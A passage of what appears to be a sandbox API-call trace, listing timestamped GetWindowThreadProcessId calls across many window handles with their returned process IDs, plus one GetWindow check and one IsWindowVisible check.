	[0611.577] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x778
	[0611.578] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0612.850] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0612.853] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0613.997] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0613.997] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0613.997] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0613.997] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0613.997] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0613.997] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x460
	[0613.997] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0613.998] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0613.998] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x3a8
	[0613.998] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1bd0
	[0613.998] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1bfc
	[0613.998] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1a78
	[0614.001] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b90
	[0614.001] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b04
	[0614.001] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b34
	[0614.001] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b64
	[0614.002] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1bb0
	[0614.002] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1acc
	[0614.002] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1a2c
	[0614.002] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x19a8
	[0614.002] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1944
	[0614.002] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x18c8
	[0614.002] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x18ac
	[0614.002] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x18ec
	[0614.003] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1898
	[0614.003] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc98
	[0614.003] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x153c
	[0614.003] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1808
	[0614.003] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12a4
	[0614.003] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1740
	[0614.003] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16c4
	[0614.004] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1820
	[0614.004] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16ac
	[0614.004] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1858
	[0614.004] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1664
	[0614.004] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10b4
	[0614.004] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10ac
	[0614.004] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10ec
	[0614.004] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1068
	[0614.004] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x17e0
	[0614.005] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x102c
	[0614.005] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x17a4
	[0614.005] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1050
	[0614.005] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1694
	[0614.005] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1770
	[0614.005] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1720
	[0614.005] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x165c
	[0614.006] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1578
	[0614.006] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16c0
	[0614.006] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x161c
	[0614.006] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1638
	[0614.006] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x15c8
	[0614.006] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1554
	[0614.006] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1674
	[0614.006] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1520
	[0614.007] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x14bc
	[0614.007] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf8c
	[0614.007] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe9c
	[0614.007] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1434
	[0614.007] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x14ec
	[0614.007] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfcc
	[0614.007] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12ac
	[0614.007] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1484
	[0614.008] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x934
	[0614.008] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc0c
	[0614.008] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb08
	[0614.008] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x948
	[0614.008] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1178
	[0614.008] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x13e0
	[0614.008] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xcd0
	[0614.008] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x13fc
	[0614.008] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdc8
	[0614.009] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc18
	[0614.009] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc2c
	[0614.009] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa1c
	[0614.012] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1244
	[0614.012] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdb0
	[0614.012] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1398
	[0614.012] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1358
	[0614.012] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1370
	[0614.012] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1340
	[0614.013] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x130c
	[0614.013] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12c0
	[0614.013] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12e4
	[0614.013] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1270
	[0614.013] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1298
	[0614.013] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x120c
	[0614.013] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x122c
	[0614.013] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x11c4
	[0614.014] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x11b0
	[0614.014] GetWindow (hWnd=0x202d6, uCmd=0x4) returned 0x0
	[0614.015] IsWindowVisible (hWnd=0x202d6) returned 0
	[0614.015] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1188
	[0614.015] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1148
	[0614.016] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1160
	[0614.016] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10fc
	[0614.016] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe34
	[0614.016] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xea4
	[0614.016] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x514
	[0614.016] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe48
	[0614.016] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xbc8
	[0614.016] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdf8
	[0614.017] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x318
	[0614.017] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xcac
	[0614.017] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x8bc
	[0614.017] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf9c
	[0614.017] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf48
	[0614.017] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe40
	[0614.017] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xecc
	[0614.017] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xeb8
	[0614.018] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe80
	[0614.018] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe98
	[0614.018] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe60
	[0614.018] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xee4
	[0614.018] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf00
	[0614.018] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdf0
	[0614.018] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe1c
	[0614.018] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdd0
	[0614.019] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd94
	[0614.019] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd74
	[0614.019] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd00
	[0614.019] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xcd8
	[0614.019] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc84
	[0614.019] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xca4
	[0614.019] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc64
	[0614.020] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc24
	[0614.020] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb84
	[0614.020] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xbac
	[0614.020] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x384
	[0614.020] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xab8
	[0614.020] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x33c
	[0614.020] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa44
	[0614.020] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa64
	[0614.021] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x8a8
	[0614.021] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xaf0
	[0614.021] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x88c
	[0614.021] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb04
	[0614.021] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x910
	[0614.021] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x230
	[0614.021] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xac0
	[0614.022] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xab4
	[0614.022] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xaac
	[0614.022] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x3d0
	[0614.022] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x978
	[0614.022] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa7c
	[0614.022] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x59c
	[0614.022] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa88
	[0614.022] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa6c
	[0614.023] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa68
	[0614.023] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x9f8
	[0614.023] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa04
	[0614.023] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x924
	[0614.023] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x8dc
	[0614.023] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x7dc
	[0614.023] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x768
	[0614.023] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x764
	[0614.024] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x820
	[0614.024] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x810
	[0614.024] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x794
	[0614.024] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x83c
	[0614.024] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x7ac
	[0614.024] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb44
	[0614.024] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb5c
	[0614.024] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x838
	[0614.024] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.025] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.025] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.025] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.025] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.025] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.025] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.025] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.025] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x818
	[0614.026] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x5b8
	[0614.026] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x494
	[0614.026] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1ec
	[0614.026] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x440
	[0614.026] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x7e8
	[0614.026] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x730
	[0614.026] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x2c8
	[0614.026] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x31c
	[0614.027] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x330
	[0614.027] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x128
	[0614.027] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x5c8
	[0614.027] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x6f8
	[0614.027] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x358
	[0614.027] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x73c
	[0614.027] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb0
	[0614.027] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x250
